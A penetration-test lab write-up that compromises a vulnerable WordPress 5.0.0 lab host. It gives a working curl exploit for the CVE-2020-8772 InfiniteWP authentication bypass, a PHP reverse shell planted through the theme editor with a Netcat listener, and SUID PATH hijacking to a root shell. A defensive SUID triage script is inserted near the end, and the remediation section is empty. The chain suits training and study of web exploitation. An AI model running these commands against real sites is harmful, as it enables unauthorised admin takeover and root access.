Tags: Offensive Lab, Web Application, CVE-2020-8772

WordPress Web Exploitation
Auth Bypass, RCE, and Privilege Escalation to Root

External penetration test of a WordPress 5.0.0 application — CVE-2020-8772 plugin authentication bypass to admin access, PHP reverse shell via theme editor, and SUID binary PATH hijacking to achieve root from an unauthenticated starting position.

Engagement Overview

Executive Summary

Nmap identified an outdated WordPress 5.0.0 installation from 2018 running on port 8888. WPScan enumerated the InfiniteWP Client plugin (version 1.9.4.4), vulnerable to CVE-2020-8772 — an authentication bypass allowing unauthenticated users to gain admin access by sending a crafted request. Admin access was achieved without credentials. The WordPress theme editor was used to upload a PHP reverse shell, establishing a foothold as www-data. Local enumeration revealed a custom SUID binary (/usr/local/bin/backup) vulnerable to PATH hijacking, which was exploited to achieve a root shell.

Attack Chain

01
Reconnaissance
Nmap port scan — identified WordPress 5.0.0 on port 8888
02
CVE-2020-8772
InfiniteWP Client auth bypass — WordPress admin access without credentials
03
Initial Foothold
Theme editor PHP reverse shell upload — shell as www-data
04
Privilege Escalation
SUID binary PATH hijacking — root shell achieved

Phase 1 — Reconnaissance

nmap -sC -sV -p- 10.10.10.100

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1
80/tcp   open  http     Apache 2.4.52 — DVWA
3000/tcp open  http     Node.js — OWASP Juice Shop
8888/tcp open  http     WordPress 5.0.0

wpscan --url http://10.10.10.100:8888 --enumerate p

[+] infinitewp-client
  | Version: 1.9.4.4
  | CVE: CVE-2020-8772
  | Title: InfiniteWP Client < 1.9.4.5 - Authentication Bypass

Phase 2 — CVE-2020-8772 Authentication Bypass

CVE-2020-8772 affects the InfiniteWP Client plugin's add_site and readd_site actions. The plugin accepts management requests as a raw POST body that begins with the marker _IWP_JSON_PREFIX_ followed by base64-encoded JSON. Every other action is verified with a signature over that JSON, but in versions before 1.9.4.5 the check was skipped for add_site and readd_site, so an unauthenticated client that names an existing administrator in params.username is logged in as that user and receives the WordPress authentication cookies in the response. The only thing the attacker needs to know is a valid admin username.

# Exploit CVE-2020-8772: log in as admin without a password.
# The plugin strips the _IWP_JSON_PREFIX_ marker from the raw POST body,
# base64/JSON-decodes the rest and, for add_site, skips the signature check.
PAYLOAD='{"iwp_action":"add_site","params":{"username":"admin"}}'
curl -s -c cookies.txt -o /dev/null -X POST "http://10.10.10.100:8888/" \
  --data "_IWP_JSON_PREFIX_$(printf '%s' "$PAYLOAD" | base64 -w0)"

# A wordpress_logged_in_* cookie in the jar means the admin session was created
grep wordpress_logged_in cookies.txt

# Reuse the cookie jar to reach the dashboard
curl -s -b cookies.txt "http://10.10.10.100:8888/wp-admin/" | grep -o '<title>[^<]*'

WordPress admin dashboard accessible. No credentials were used at any point.

Phase 3 — Initial Foothold via Theme Editor

With admin access, the WordPress theme editor (Appearance → Editor) allows direct editing of the active theme's PHP files; it is available because the site does not set DISALLOW_FILE_EDIT. The 404.php template of the default Twenty Nineteen theme was replaced with a PentestMonkey PHP reverse shell pointing at the attacker's Netcat listener.

# Start listener on attacker machine
nc -lvnp 4444

# Trigger the reverse shell by requesting the 404 page
curl http://10.10.10.100:8888/wp-content/themes/twentynineteen/404.php
# Shell received — stabilize with python pty
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z → stty raw -echo; fg

www-data@ubuntu:/var/www/html$

Phase 4 — Privilege Escalation

Local enumeration identified a custom SUID binary at /usr/local/bin/backup. Running strings on the binary revealed it calls tar using a relative path — vulnerable to PATH hijacking.

# Identify SUID binaries
find / -perm -u=s -type f 2>/dev/null

/usr/local/bin/backup  ← Non-standard SUID binary

# Examine binary for exploitable commands
strings /usr/local/bin/backup | grep -E 'tar|cp|cat'

tar cf /tmp/backup.tar /var/www/html  ← calls tar without full path

# PATH hijacking exploit: create a fake tar that the SUID binary finds first
cd /tmp
echo '#!/bin/bash' > tar
echo 'bash -p' >> tar      # -p keeps the effective UID; without it bash drops root
chmod +x tar
export PATH=/tmp:$PATH     # the SUID binary inherits PATH, so /tmp/tar shadows /usr/bin/tar

# Execute SUID binary — calls our malicious tar
/usr/local/bin/backup

root@ubuntu:/tmp#  ← Root shell achieved
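The strings | grep step above looks for three command names by hand. As an added triage helper (not part of the original write-up), the script below generalises it: it pulls printable strings out of a binary, splits each on shell separators, and flags any segment whose first word is a bare command name, since only a bare name is resolved through PATH. The COMMANDS set and the embedded sample bytes are constructed for the example; a hit means the binary may call the command through system() or popen() and still has to be confirmed with ltrace, strace or a disassembler.

```python
"""SUID relative-command triage (added example, not the original write-up's code)."""
import re
import sys

# Command names commonly handed to system()/popen() by helper binaries (assumed list).
COMMANDS = {"tar", "cp", "cat", "sh", "bash", "gzip", "zip", "rm", "mv", "chmod",
            "chown", "find", "mysqldump", "rsync", "service", "systemctl"}

STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")          # printable runs of 4+ bytes, as strings(1)
SEGMENT_RE = re.compile(r"\s*(?:&&|\|\||[;|])\s*")    # shell separators between commands


def extract_strings(blob: bytes) -> list:
    """Printable ASCII strings of at least four characters, in file order."""
    return [m.group().decode("ascii") for m in STRING_RE.finditer(blob)]


def relative_command_strings(blob: bytes) -> list:
    """Strings containing a known command written without a leading '/'.

    'tar cf /tmp/backup.tar /var/www/html' is flagged; '/bin/tar cf ...' is not,
    because an absolute path is executed without consulting PATH.
    """
    hits = []
    for s in extract_strings(blob):
        for segment in SEGMENT_RE.split(s):
            tokens = segment.split()
            if tokens and tokens[0] in COMMANDS:
                hits.append(s)
                break
    return hits


# Constructed stand-in for a binary: an ELF-like header plus a few embedded strings.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"tar cf /tmp/backup.tar /var/www/html\x00"   # bare name: hijackable
    + b"/bin/gzip -9 /tmp/backup.tar\x00"           # absolute path: safe
    + b"cd /var/www && zip -r /tmp/site.zip .\x00"  # bare name after &&: hijackable
    + b"GLIBC_2.34\x00__libc_start_main\x00"
)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    for hit in relative_command_strings(data):
        print("PATH-resolved command:", hit)
```

Point it at every non-standard hit from the find command (`python3 triage.py /usr/local/bin/backup`). Binaries that set their own PATH, drop privileges, or exec the helper by absolute path will still show up here if the string is present, so the result is a shortlist, not a verdict.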

Findings & Remediation

MITRE ATT&CK Mapping

Tools Used

Nmap
WPScan
curl
Netcat
PentestMonkey PHP Shell
Linux utilities